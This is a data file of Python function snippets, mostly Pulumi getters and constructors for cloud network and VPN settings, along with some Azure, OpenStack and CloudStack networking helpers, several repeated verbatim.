"def _get_network_plugin(self, enable_validation: bool = False) -> Union[str, None]:\n # read the original value passed by the command\n network_plugin = self.raw_param.get(\"network_plugin\")\n # try to read the property value corresponding to the parameter from the `mc` object\n if (\n self.mc and\n self.mc.network_profile and\n self.mc.network_profile.network_plugin is not None\n ):\n network_plugin = self.mc.network_profile.network_plugin\n\n # this parameter does not need dynamic completion\n # validation\n if enable_validation:\n (\n pod_cidr,\n service_cidr,\n dns_service_ip,\n docker_bridge_address,\n network_policy,\n ) = self._get_pod_cidr_and_service_cidr_and_dns_service_ip_and_docker_bridge_address_and_network_policy(\n enable_validation=False\n )\n network_plugin_mode = self._get_network_plugin_mode(enable_validation=False)\n if network_plugin:\n if network_plugin == \"azure\" and pod_cidr and network_plugin_mode != \"overlay\":\n raise InvalidArgumentValueError(\n \"Please specify network plugin mode `overlay` when using --pod-cidr or \"\n \"use network plugin `kubenet`. For more information about Azure CNI \"\n \"Overlay please see https://aka.ms/aks/azure-cni-overlay\"\n )\n else:\n if (\n pod_cidr or\n service_cidr or\n dns_service_ip or\n docker_bridge_address or\n network_policy\n ):\n raise RequiredArgumentMissingError(\n \"Please explicitly specify the network plugin type\"\n )\n return network_plugin",
"def get_plugin_description(self):\n return (\"L3 Router Service Plugin for basic L3 forwarding\"\n \" using OVN\")",
"def get_plugin_description(self):\n return (\"L3 Router Service Plugin for basic L3 forwarding\"\n \" using OVN\")",
"def _validate_network_plugin(\n self, context, network_info,\n plugin_type=projectpluginmap.NsxPlugins.NSX_V):\n if not network_info.get('network_id'):\n msg = _(\"network_id must be specified\")\n raise n_exc.BadRequest(resource=bgp_ext.BGP_SPEAKER_RESOURCE_NAME,\n msg=msg)\n net_id = network_info['network_id']\n p = self._core_plugin._get_plugin_from_net_id(context, net_id)\n if p.plugin_type() != plugin_type:\n msg = (_('Network should belong to the %s plugin as the bgp '\n 'speaker') % plugin_type)\n raise n_exc.InvalidInput(error_message=msg)",
"def internet_advertising_disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"internet_advertising_disabled\")",
"def internet_advertising_disabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"internet_advertising_disabled\")",
"def AddNetworkFlag(parser):\n help_text = \"\"\"\\\n The VPC network from which the AlloyDB instance is accessible via private\n IP. For example, projects/myProject/global/networks/default. This setting\n cannot be updated after it is set.\n \"\"\"\n parser.add_argument('--network', help=help_text)",
"def network_configuration(self) -> Optional[pulumi.Input['ServiceNetworkConfigurationArgs']]:\n return pulumi.get(self, \"network_configuration\")",
"def network_configuration(self) -> Optional[pulumi.Input['ServiceNetworkConfigurationArgs']]:\n return pulumi.get(self, \"network_configuration\")",
"def network(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network\")",
"def use_service_networking(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"use_service_networking\")",
"def scenario(self):\n warnings.simplefilter('always', PendingDeprecationWarning)\n warnings.warn(\n \"self.k.scenario will be deprecated in a future release. Please \"\n \"use self.k.network instead.\",\n PendingDeprecationWarning\n )\n return self.network",
"def get_ui_field_behaviour() -> dict[str, Any]:\n return {\n \"hidden_fields\": [\"port\", \"schema\"],\n \"relabeling\": {\"host\": \"Connection URL\"},\n }",
"def network_config(self) -> Optional[pulumi.Input['PrivateCloudNetworkConfigArgs']]:\n return pulumi.get(self, \"network_config\")",
"def __init__(self):\n self.id = None\n self.typeInfo['id'] = 'string'\n \"\"\"availability of the network offering\"\"\"\n self.availability = None\n self.typeInfo['availability'] = 'string'\n \"\"\"true if network offering is ip conserve mode enabled\"\"\"\n self.conservemode = None\n self.typeInfo['conservemode'] = 'boolean'\n \"\"\"the date this network offering was created\"\"\"\n self.created = None\n self.typeInfo['created'] = 'date'\n \"\"\"additional key/value details tied with network offering\"\"\"\n self.details = None\n self.typeInfo['details'] = 'map'\n \"\"\"an alternate display text of the network offering.\"\"\"\n self.displaytext = None\n self.typeInfo['displaytext'] = 'string'\n \"\"\"true if guest network default egress policy is allow; false if default egress policy is deny\"\"\"\n self.egressdefaultpolicy = None\n self.typeInfo['egressdefaultpolicy'] = 'boolean'\n \"\"\"true if network offering can be used by VPC networks only\"\"\"\n self.forvpc = None\n self.typeInfo['forvpc'] = 'boolean'\n \"\"\"guest type of the network offering, can be Shared or Isolated\"\"\"\n self.guestiptype = None\n self.typeInfo['guestiptype'] = 'string'\n \"\"\"true if network offering is default, false otherwise\"\"\"\n self.isdefault = None\n self.typeInfo['isdefault'] = 'boolean'\n \"\"\"true if network offering supports persistent networks, false otherwise\"\"\"\n self.ispersistent = None\n self.typeInfo['ispersistent'] = 'boolean'\n \"\"\"maximum number of concurrents connections to be handled by lb\"\"\"\n self.maxconnections = None\n self.typeInfo['maxconnections'] = 'integer'\n \"\"\"the name of the network offering\"\"\"\n self.name = None\n self.typeInfo['name'] = 'string'\n \"\"\"data transfer rate in megabits per second allowed.\"\"\"\n self.networkrate = None\n self.typeInfo['networkrate'] = 'integer'\n \"\"\"the ID of the secondary service offering used by virtual router provider\"\"\"\n self.secondaryserviceofferingid = None\n self.typeInfo['secondaryserviceofferingid'] = 'string'\n \"\"\"the name of the secondary service offering used by virtual router provider\"\"\"\n self.secondaryserviceofferingname = None\n self.typeInfo['secondaryserviceofferingname'] = 'string'\n \"\"\"the ID of the service offering used by virtual router provider\"\"\"\n self.serviceofferingid = None\n self.typeInfo['serviceofferingid'] = 'string'\n \"\"\"the name of the service offering used by virtual router provider\"\"\"\n self.serviceofferingname = None\n self.typeInfo['serviceofferingname'] = 'string'\n \"\"\"true if network offering supports specifying ip ranges, false otherwise\"\"\"\n self.specifyipranges = None\n self.typeInfo['specifyipranges'] = 'boolean'\n \"\"\"true if network offering supports vlans, false otherwise\"\"\"\n self.specifyvlan = None\n self.typeInfo['specifyvlan'] = 'boolean'\n \"\"\"state of the network offering. Can be Disabled/Enabled/Inactive\"\"\"\n self.state = None\n self.typeInfo['state'] = 'string'\n \"\"\"true if network offering supports network that span multiple zones\"\"\"\n self.supportsstrechedl2subnet = None\n self.typeInfo['supportsstrechedl2subnet'] = 'boolean'\n \"\"\"the tags for the network offering\"\"\"\n self.tags = None\n self.typeInfo['tags'] = 'string'\n \"\"\"the traffic type for the network offering, supported types are Public, Management, Control, Guest, Vlan or Storage.\"\"\"\n self.traffictype = None\n self.typeInfo['traffictype'] = 'string'\n \"\"\"the list of supported services\"\"\"\n self.service = []",
"def backend_plugin(self):\n return None",
"def protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"protocol\")",
"def protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"protocol\")",
"def protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"protocol\")",
"def protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"protocol\")",
"def protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"protocol\")",
"def ip_protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ip_protocol\")",
"def _commercial_fields(self):\n return ['website']",
"def plugin_name(self):\n return \"optipng\"",
"def instance_charge_type(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"Field `instance_charge_type` has been deprecated from version 1.187.0. Use `payment_type` instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"instance_charge_type is deprecated: Field `instance_charge_type` has been deprecated from version 1.187.0. Use `payment_type` instead.\"\"\")\n\n return pulumi.get(self, \"instance_charge_type\")",
"def instance_charge_type(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"Field `instance_charge_type` has been deprecated from version 1.187.0. Use `payment_type` instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"instance_charge_type is deprecated: Field `instance_charge_type` has been deprecated from version 1.187.0. Use `payment_type` instead.\"\"\")\n\n return pulumi.get(self, \"instance_charge_type\")",
"def block_override_dns_type(self) -> str:\n return pulumi.get(self, \"block_override_dns_type\")",
"def __init__(__self__, *,\n datapath_provider: Optional[pulumi.Input['NetworkConfigDatapathProvider']] = None,\n default_snat_status: Optional[pulumi.Input['DefaultSnatStatusArgs']] = None,\n dns_config: Optional[pulumi.Input['DNSConfigArgs']] = None,\n enable_intra_node_visibility: Optional[pulumi.Input[bool]] = None,\n enable_l4ilb_subsetting: Optional[pulumi.Input[bool]] = None,\n gateway_api_config: Optional[pulumi.Input['GatewayAPIConfigArgs']] = None,\n private_ipv6_google_access: Optional[pulumi.Input['NetworkConfigPrivateIpv6GoogleAccess']] = None,\n service_external_ips_config: Optional[pulumi.Input['ServiceExternalIPsConfigArgs']] = None):\n if datapath_provider is not None:\n pulumi.set(__self__, \"datapath_provider\", datapath_provider)\n if default_snat_status is not None:\n pulumi.set(__self__, \"default_snat_status\", default_snat_status)\n if dns_config is not None:\n pulumi.set(__self__, \"dns_config\", dns_config)\n if enable_intra_node_visibility is not None:\n pulumi.set(__self__, \"enable_intra_node_visibility\", enable_intra_node_visibility)\n if enable_l4ilb_subsetting is not None:\n pulumi.set(__self__, \"enable_l4ilb_subsetting\", enable_l4ilb_subsetting)\n if gateway_api_config is not None:\n pulumi.set(__self__, \"gateway_api_config\", gateway_api_config)\n if private_ipv6_google_access is not None:\n pulumi.set(__self__, \"private_ipv6_google_access\", private_ipv6_google_access)\n if service_external_ips_config is not None:\n pulumi.set(__self__, \"service_external_ips_config\", service_external_ips_config)",
"def type(self, type):\n allowed_values = [\"android\", \"ios\"]\n if type.lower() not in map(str.lower, allowed_values):\n # print(\"Invalid value for type -> \" + type)\n self._type = \"outdated_sdk_version\"\n else:\n self._type = type",
"def network_dataplane(self) -> Optional[pulumi.Input[Union[str, 'NetworkDataplane']]]:\n return pulumi.get(self, \"network_dataplane\")",
"def spec(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"Field 'Spec' has been deprecated from provider version 1.205.0. IPv6 gateways do not distinguish between specifications. This parameter is no longer used.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"spec is deprecated: Field 'Spec' has been deprecated from provider version 1.205.0. IPv6 gateways do not distinguish between specifications. This parameter is no longer used.\"\"\")\n\n return pulumi.get(self, \"spec\")",
"def spec(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"Field 'Spec' has been deprecated from provider version 1.205.0. IPv6 gateways do not distinguish between specifications. This parameter is no longer used.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"spec is deprecated: Field 'Spec' has been deprecated from provider version 1.205.0. IPv6 gateways do not distinguish between specifications. This parameter is no longer used.\"\"\")\n\n return pulumi.get(self, \"spec\")",
"def type(self) -> Optional[pulumi.Input['ClusterTelemetryType']]:\n return pulumi.get(self, \"type\")",
"def network_config(self) -> pulumi.Input['PrivateCloudNetworkConfigArgs']:\n return pulumi.get(self, \"network_config\")",
"def protocol(self):\n raise UnsupportedCall(f\"'{self.__class__.__name__}' object has no attribute 'protocol'\")",
"def internet_advertising_disabled(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"internet_advertising_disabled\")",
"def network_config(self) -> Optional[pulumi.Input['NodeNetworkConfigArgs']]:\n return pulumi.get(self, \"network_config\")",
"def trafficProtocol(self):\n #\n # TODO: Reimplement this if possible.\n #\n return client.trafficProtocol(self)",
"def network_interface(self): \n return self._network_interface",
"def network_mode(self) -> Optional[pulumi.Input[Union[str, 'NetworkMode']]]:\n return pulumi.get(self, \"network_mode\")",
"def network(self) -> str:\n return pulumi.get(self, \"network\")",
"def protocol(self) -> Optional[pulumi.Input[Union[str, 'Protocol']]]:\n return pulumi.get(self, \"protocol\")",
"def get_network_dataplane(self) -> Union[str, None]:\n return self.raw_param.get(\"network_dataplane\")",
"def _configure_neutron_api(self):\n logging.info('Configuring `manage-neutron-plugin-legacy-mode` for '\n 'neutron-api...')\n n_api_config = {\n 'manage-neutron-plugin-legacy-mode': False,\n }\n with self.config_change(\n n_api_config, n_api_config, 'neutron-api'):\n logging.info('done')",
"def plugin_type(self) -> Optional[pulumi.Input[Union[str, 'KubernetesPluginType']]]:\n return pulumi.get(self, \"plugin_type\")",
"def plugin_type(self) -> Optional[pulumi.Input[Union[str, 'KubernetesPluginType']]]:\n return pulumi.get(self, \"plugin_type\")",
"def plugin_type(self) -> Optional[pulumi.Input[Union[str, 'KubernetesPluginType']]]:\n return pulumi.get(self, \"plugin_type\")",
"def add_field(self, field_name, label, description, type, function=None):\n new_field = {\n \"label\": label,\n \"description\": description,\n \"type\": type,\n }\n if function is not None:\n new_field[\"source\"] = \"function\"\n self.fields[field_name] = function\n else:\n new_field[\"source\"] = \"system\"\n self.fields[field_name] = \"No value\"\n self.description[\"fields\"][\"values\"][field_name] = new_field\n\n # update MongoDB\n #self.mongo_client.cps2_project.objects.update_one(\n #{\"_id\": self.mongo_id},\n #{\"$set\": {\"fields.values.\" + field_name: new_field,\n #\"last_modified.value\": str(datetime.utcnow())}\n #}\n #)\n print(\"Added a new field called \\\"\" + field_name + \"\\\" and updated MongoDB.\")",
"def provider(self) -> Optional[pulumi.Input['NetworkPolicyProvider']]:\n return pulumi.get(self, \"provider\")",
"def node_topology(self) -> \"LabelSelector\":\n return typing.cast(\n \"LabelSelector\",\n self._properties.get(\"nodeTopology\"),\n )",
"def get_default_config(self):\n if not self.iface_type:\n return None\n\n defaults = {}\n defaults['description'] = self.interface_name + ' Interface'\n defaults['admin'] = 'up'\n if self.is_ethernet:\n defaults['speed'] = 'auto'\n defaults['duplex'] = 'auto'\n defaults['type'] = 'bridged'\n elif self.iface_type == 'Bridge-Aggregation':\n defaults['type'] = 'bridged'\n else:\n defaults['type'] = 'routed'\n\n return defaults",
"def server_type(self):\n ...",
"def accelerated_network(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"accelerated_network\")",
"def get_plugin_type(self):\n return constants.L2GW",
"def set_network_connection_type(self,param={},ignore_error_handle = False):\n message = {};\n step = 'set network connection type \\'' + str(param.get('network_type',0)) + '\\'';\n network_type = param.get('network_type',0);\n try:\n if network_type == 0:\n self.driver.set_network_connection(ConnectionType.NO_CONNECTION);\n elif network_type == 1:\n self.driver.set_network_connection(ConnectionType.AIRPLANE_MODE);\n elif network_type == 2:\n self.driver.set_network_connection(ConnectionType.WIFI_ONLY);\n elif network_type == 4:\n self.driver.set_network_connection(ConnectionType.DATA_ONLY);\n elif network_type == 6:\n self.driver.set_network_connection(ConnectionType.ALL_NETWORK_ON);\n else:\n self.driver.set_network_connection(ConnectionType.NO_CONNECTION);\n message = self.feedback.feedback_action_ok(step);\n except BaseException,e:\n message = self.feedback.feedback_action_fail(step,str(e),ignore_error_handle);\n finally:\n return message;",
"def getProtocol(self) -> str:\n ...",
"def ip_type(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ip_type\")",
"def __init__(__self__, *,\n ip_tag_type: Optional[pulumi.Input[str]] = None,\n tag: Optional[pulumi.Input[str]] = None):\n if ip_tag_type is not None:\n pulumi.set(__self__, \"ip_tag_type\", ip_tag_type)\n if tag is not None:\n pulumi.set(__self__, \"tag\", tag)",
"def __init__(__self__, *,\n type: Optional[pulumi.Input['ClusterTelemetryType']] = None):\n if type is not None:\n pulumi.set(__self__, \"type\", type)",
"def protocol(self):\n ...",
"def network_profile(self) -> Optional[pulumi.Input['NetworkProfileArgs']]:\n return pulumi.get(self, \"network_profile\")",
"def network_profile(self) -> Optional[pulumi.Input['NetworkProfileArgs']]:\n return pulumi.get(self, \"network_profile\")",
"def _get_protocol_type(self):\n return self.__protocol_type",
"def _get_lsp_config_ospf_ignore_metric(self):\n return self.__lsp_config_ospf_ignore_metric",
"def __init__(__self__, *,\n customer_gateway_id: pulumi.Input[str],\n type: pulumi.Input[str],\n enable_acceleration: Optional[pulumi.Input[bool]] = None,\n local_ipv4_network_cidr: Optional[pulumi.Input[str]] = None,\n local_ipv6_network_cidr: Optional[pulumi.Input[str]] = None,\n outside_ip_address_type: Optional[pulumi.Input[str]] = None,\n remote_ipv4_network_cidr: Optional[pulumi.Input[str]] = None,\n remote_ipv6_network_cidr: Optional[pulumi.Input[str]] = None,\n static_routes_only: Optional[pulumi.Input[bool]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n transit_gateway_id: Optional[pulumi.Input[str]] = None,\n transport_transit_gateway_attachment_id: Optional[pulumi.Input[str]] = None,\n tunnel1_dpd_timeout_action: Optional[pulumi.Input[str]] = None,\n tunnel1_dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_enable_tunnel_lifecycle_control: Optional[pulumi.Input[bool]] = None,\n tunnel1_ike_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_inside_cidr: Optional[pulumi.Input[str]] = None,\n tunnel1_inside_ipv6_cidr: Optional[pulumi.Input[str]] = None,\n tunnel1_log_options: Optional[pulumi.Input['VpnConnectionTunnel1LogOptionsArgs']] = None,\n tunnel1_phase1_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel1_phase1_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase1_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase1_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_phase2_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel1_phase2_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase2_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase2_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_preshared_key: Optional[pulumi.Input[str]] = None,\n tunnel1_rekey_fuzz_percentage: Optional[pulumi.Input[int]] = None,\n tunnel1_rekey_margin_time_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_replay_window_size: Optional[pulumi.Input[int]] = None,\n tunnel1_startup_action: Optional[pulumi.Input[str]] = None,\n tunnel2_dpd_timeout_action: Optional[pulumi.Input[str]] = None,\n tunnel2_dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_enable_tunnel_lifecycle_control: Optional[pulumi.Input[bool]] = None,\n tunnel2_ike_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_inside_cidr: Optional[pulumi.Input[str]] = None,\n tunnel2_inside_ipv6_cidr: Optional[pulumi.Input[str]] = None,\n tunnel2_log_options: Optional[pulumi.Input['VpnConnectionTunnel2LogOptionsArgs']] = None,\n tunnel2_phase1_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel2_phase1_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase1_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase1_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_phase2_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel2_phase2_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase2_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase2_lifetime_seconds: Optional[pulumi.Input[int]] = 
None,\n tunnel2_preshared_key: Optional[pulumi.Input[str]] = None,\n tunnel2_rekey_fuzz_percentage: Optional[pulumi.Input[int]] = None,\n tunnel2_rekey_margin_time_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_replay_window_size: Optional[pulumi.Input[int]] = None,\n tunnel2_startup_action: Optional[pulumi.Input[str]] = None,\n tunnel_inside_ip_version: Optional[pulumi.Input[str]] = None,\n vpn_gateway_id: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"customer_gateway_id\", customer_gateway_id)\n pulumi.set(__self__, \"type\", type)\n if enable_acceleration is not None:\n pulumi.set(__self__, \"enable_acceleration\", enable_acceleration)\n if local_ipv4_network_cidr is not None:\n pulumi.set(__self__, \"local_ipv4_network_cidr\", local_ipv4_network_cidr)\n if local_ipv6_network_cidr is not None:\n pulumi.set(__self__, \"local_ipv6_network_cidr\", local_ipv6_network_cidr)\n if outside_ip_address_type is not None:\n pulumi.set(__self__, \"outside_ip_address_type\", outside_ip_address_type)\n if remote_ipv4_network_cidr is not None:\n pulumi.set(__self__, \"remote_ipv4_network_cidr\", remote_ipv4_network_cidr)\n if remote_ipv6_network_cidr is not None:\n pulumi.set(__self__, \"remote_ipv6_network_cidr\", remote_ipv6_network_cidr)\n if static_routes_only is not None:\n pulumi.set(__self__, \"static_routes_only\", static_routes_only)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if transit_gateway_id is not None:\n pulumi.set(__self__, \"transit_gateway_id\", transit_gateway_id)\n if transport_transit_gateway_attachment_id is not None:\n pulumi.set(__self__, \"transport_transit_gateway_attachment_id\", transport_transit_gateway_attachment_id)\n if tunnel1_dpd_timeout_action is not None:\n pulumi.set(__self__, \"tunnel1_dpd_timeout_action\", tunnel1_dpd_timeout_action)\n if tunnel1_dpd_timeout_seconds is not None:\n pulumi.set(__self__, \"tunnel1_dpd_timeout_seconds\", tunnel1_dpd_timeout_seconds)\n if tunnel1_enable_tunnel_lifecycle_control is not None:\n pulumi.set(__self__, \"tunnel1_enable_tunnel_lifecycle_control\", tunnel1_enable_tunnel_lifecycle_control)\n if tunnel1_ike_versions is not None:\n pulumi.set(__self__, \"tunnel1_ike_versions\", tunnel1_ike_versions)\n if tunnel1_inside_cidr is not None:\n pulumi.set(__self__, \"tunnel1_inside_cidr\", tunnel1_inside_cidr)\n if tunnel1_inside_ipv6_cidr is not None:\n pulumi.set(__self__, \"tunnel1_inside_ipv6_cidr\", tunnel1_inside_ipv6_cidr)\n if tunnel1_log_options is not None:\n pulumi.set(__self__, \"tunnel1_log_options\", tunnel1_log_options)\n if tunnel1_phase1_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel1_phase1_dh_group_numbers\", tunnel1_phase1_dh_group_numbers)\n if tunnel1_phase1_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase1_encryption_algorithms\", tunnel1_phase1_encryption_algorithms)\n if tunnel1_phase1_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase1_integrity_algorithms\", tunnel1_phase1_integrity_algorithms)\n if tunnel1_phase1_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel1_phase1_lifetime_seconds\", tunnel1_phase1_lifetime_seconds)\n if tunnel1_phase2_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel1_phase2_dh_group_numbers\", tunnel1_phase2_dh_group_numbers)\n if tunnel1_phase2_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase2_encryption_algorithms\", tunnel1_phase2_encryption_algorithms)\n if tunnel1_phase2_integrity_algorithms is not None:\n 
pulumi.set(__self__, \"tunnel1_phase2_integrity_algorithms\", tunnel1_phase2_integrity_algorithms)\n if tunnel1_phase2_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel1_phase2_lifetime_seconds\", tunnel1_phase2_lifetime_seconds)\n if tunnel1_preshared_key is not None:\n pulumi.set(__self__, \"tunnel1_preshared_key\", tunnel1_preshared_key)\n if tunnel1_rekey_fuzz_percentage is not None:\n pulumi.set(__self__, \"tunnel1_rekey_fuzz_percentage\", tunnel1_rekey_fuzz_percentage)\n if tunnel1_rekey_margin_time_seconds is not None:\n pulumi.set(__self__, \"tunnel1_rekey_margin_time_seconds\", tunnel1_rekey_margin_time_seconds)\n if tunnel1_replay_window_size is not None:\n pulumi.set(__self__, \"tunnel1_replay_window_size\", tunnel1_replay_window_size)\n if tunnel1_startup_action is not None:\n pulumi.set(__self__, \"tunnel1_startup_action\", tunnel1_startup_action)\n if tunnel2_dpd_timeout_action is not None:\n pulumi.set(__self__, \"tunnel2_dpd_timeout_action\", tunnel2_dpd_timeout_action)\n if tunnel2_dpd_timeout_seconds is not None:\n pulumi.set(__self__, \"tunnel2_dpd_timeout_seconds\", tunnel2_dpd_timeout_seconds)\n if tunnel2_enable_tunnel_lifecycle_control is not None:\n pulumi.set(__self__, \"tunnel2_enable_tunnel_lifecycle_control\", tunnel2_enable_tunnel_lifecycle_control)\n if tunnel2_ike_versions is not None:\n pulumi.set(__self__, \"tunnel2_ike_versions\", tunnel2_ike_versions)\n if tunnel2_inside_cidr is not None:\n pulumi.set(__self__, \"tunnel2_inside_cidr\", tunnel2_inside_cidr)\n if tunnel2_inside_ipv6_cidr is not None:\n pulumi.set(__self__, \"tunnel2_inside_ipv6_cidr\", tunnel2_inside_ipv6_cidr)\n if tunnel2_log_options is not None:\n pulumi.set(__self__, \"tunnel2_log_options\", tunnel2_log_options)\n if tunnel2_phase1_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel2_phase1_dh_group_numbers\", tunnel2_phase1_dh_group_numbers)\n if tunnel2_phase1_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase1_encryption_algorithms\", tunnel2_phase1_encryption_algorithms)\n if tunnel2_phase1_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase1_integrity_algorithms\", tunnel2_phase1_integrity_algorithms)\n if tunnel2_phase1_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel2_phase1_lifetime_seconds\", tunnel2_phase1_lifetime_seconds)\n if tunnel2_phase2_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel2_phase2_dh_group_numbers\", tunnel2_phase2_dh_group_numbers)\n if tunnel2_phase2_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase2_encryption_algorithms\", tunnel2_phase2_encryption_algorithms)\n if tunnel2_phase2_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase2_integrity_algorithms\", tunnel2_phase2_integrity_algorithms)\n if tunnel2_phase2_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel2_phase2_lifetime_seconds\", tunnel2_phase2_lifetime_seconds)\n if tunnel2_preshared_key is not None:\n pulumi.set(__self__, \"tunnel2_preshared_key\", tunnel2_preshared_key)\n if tunnel2_rekey_fuzz_percentage is not None:\n pulumi.set(__self__, \"tunnel2_rekey_fuzz_percentage\", tunnel2_rekey_fuzz_percentage)\n if tunnel2_rekey_margin_time_seconds is not None:\n pulumi.set(__self__, \"tunnel2_rekey_margin_time_seconds\", tunnel2_rekey_margin_time_seconds)\n if tunnel2_replay_window_size is not None:\n pulumi.set(__self__, \"tunnel2_replay_window_size\", tunnel2_replay_window_size)\n if tunnel2_startup_action is not None:\n pulumi.set(__self__, 
\"tunnel2_startup_action\", tunnel2_startup_action)\n if tunnel_inside_ip_version is not None:\n pulumi.set(__self__, \"tunnel_inside_ip_version\", tunnel_inside_ip_version)\n if vpn_gateway_id is not None:\n pulumi.set(__self__, \"vpn_gateway_id\", vpn_gateway_id)",
"def __init__(__self__, *,\n arn: Optional[pulumi.Input[str]] = None,\n core_network_arn: Optional[pulumi.Input[str]] = None,\n core_network_attachment_arn: Optional[pulumi.Input[str]] = None,\n customer_gateway_configuration: Optional[pulumi.Input[str]] = None,\n customer_gateway_id: Optional[pulumi.Input[str]] = None,\n enable_acceleration: Optional[pulumi.Input[bool]] = None,\n local_ipv4_network_cidr: Optional[pulumi.Input[str]] = None,\n local_ipv6_network_cidr: Optional[pulumi.Input[str]] = None,\n outside_ip_address_type: Optional[pulumi.Input[str]] = None,\n remote_ipv4_network_cidr: Optional[pulumi.Input[str]] = None,\n remote_ipv6_network_cidr: Optional[pulumi.Input[str]] = None,\n routes: Optional[pulumi.Input[Sequence[pulumi.Input['VpnConnectionRouteArgs']]]] = None,\n static_routes_only: Optional[pulumi.Input[bool]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n transit_gateway_attachment_id: Optional[pulumi.Input[str]] = None,\n transit_gateway_id: Optional[pulumi.Input[str]] = None,\n transport_transit_gateway_attachment_id: Optional[pulumi.Input[str]] = None,\n tunnel1_address: Optional[pulumi.Input[str]] = None,\n tunnel1_bgp_asn: Optional[pulumi.Input[str]] = None,\n tunnel1_bgp_holdtime: Optional[pulumi.Input[int]] = None,\n tunnel1_cgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel1_dpd_timeout_action: Optional[pulumi.Input[str]] = None,\n tunnel1_dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_enable_tunnel_lifecycle_control: Optional[pulumi.Input[bool]] = None,\n tunnel1_ike_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_inside_cidr: Optional[pulumi.Input[str]] = None,\n tunnel1_inside_ipv6_cidr: Optional[pulumi.Input[str]] = None,\n tunnel1_log_options: Optional[pulumi.Input['VpnConnectionTunnel1LogOptionsArgs']] = None,\n tunnel1_phase1_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel1_phase1_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase1_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase1_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_phase2_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel1_phase2_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n 